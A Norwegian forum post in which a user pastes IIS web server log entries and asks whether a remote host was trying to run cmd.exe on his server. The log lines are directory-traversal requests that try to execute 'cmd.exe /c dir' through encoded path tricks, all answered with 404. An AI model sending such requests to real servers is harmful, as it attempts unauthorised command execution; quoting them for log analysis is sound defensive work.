Gå til innhold
Trenger du hjelp med internett og nettverk? Still spørsmål her ×

Analysering av IIS logg..


Anbefalte innlegg

Titta igjennom loggen min for idag (IIS), og da kom jeg over dette:

2004-01-29 06:24:53 111.111.111.111 - 10.0.0.4 80 GET /scripts/root.exe /c+dir 404 -
2004-01-29 06:24:53 111.111.111.111 - 10.0.0.4 80 GET /MSADC/root.exe /c+dir 404 -
2004-01-29 06:24:53 111.111.111.111 - 10.0.0.4 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:24:54 111.111.111.111 - 10.0.0.4 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:24:54 111.111.111.111 - 10.0.0.4 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:25:15 111.111.111.111 - 10.0.0.4 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:25:15 111.111.111.111 - 10.0.0.4 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:25:15 111.111.111.111 - 10.0.0.4 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:25:15 111.111.111.111 - 10.0.0.4 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:25:17 111.111.111.111 - 10.0.0.4 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:25:17 111.111.111.111 - 10.0.0.4 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:25:17 111.111.111.111 - 10.0.0.4 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:25:18 111.111.111.111 - 10.0.0.4 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:25:18 111.111.111.111 - 10.0.0.4 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:25:18 111.111.111.111 - 10.0.0.4 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2004-01-29 06:25:19 111.111.111.111 - 10.0.0.4 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -

 

- Sånn som det ser ut for meg, prøver denne karen og få kjørt cmd.exe, og prøver en rekke tilfeldige dir's hvor den "evt" kan ligge.. Kanskje i håp om og finne en eller annen webserver som feks deler C:\(root), og gir tilgang til og kjøre filer.. Er jeg helt på jordet da eller? Har foresten sensurert ipen hans.. Den kom fra .fr :ermm:

Lenke til kommentar
Videoannonse
Annonse

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
  • Hvem er aktive   0 medlemmer

    • Ingen innloggede medlemmer aktive
×
×
  • Opprett ny...